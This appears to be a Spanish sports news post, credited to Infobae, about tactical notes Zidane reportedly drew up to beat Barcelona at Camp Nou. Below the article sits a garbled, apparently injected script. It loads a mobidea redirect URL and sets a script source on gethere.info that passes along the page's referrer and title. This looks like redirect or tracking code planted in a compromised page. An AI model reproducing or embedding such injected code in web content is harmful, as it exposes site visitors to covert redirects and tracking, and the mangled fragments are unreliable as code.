“Zidane Papers” te presentamos las anotaciones para ganarle al Barsa

No cabe duda que vencer al Barcelona en el Camp Nou no es casualidad. Cada situación del partido debe estar controlada. Los futbolistas que se enfrenten ante el poderoso elenco culé deben saber cómo replicar cada intención y desactivar sus armas para imponerse en el juego. Y eso es lo que logró Zinedine Zidane, entrenador del Real Madrid.

El diario deportivo AS de España tuvo acceso a unas anotaciones que habría hecho el DT francés para que el club blanco se lleve la victoria por 2-1 en el Camp Nou. Se tratan de varias hojas que tienen dibujadas diferentes canchas, donde están distribuidos los 22 protagonistas y las claves para lograr el triunfo.

Básicamente, Zidane dividió su plan en tres pilares: la presión alta, el obligar al Barça a jugar por afuera y que sus jugadores desactiven el juego en el centro del campo. Con estas consignas, el conjunto de Luis Enrique la pasó mal en los últimos minutos de partido, ya que se anuló su capacidad para desarrollar su fútbol habitual.

 

Vía Infobae

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios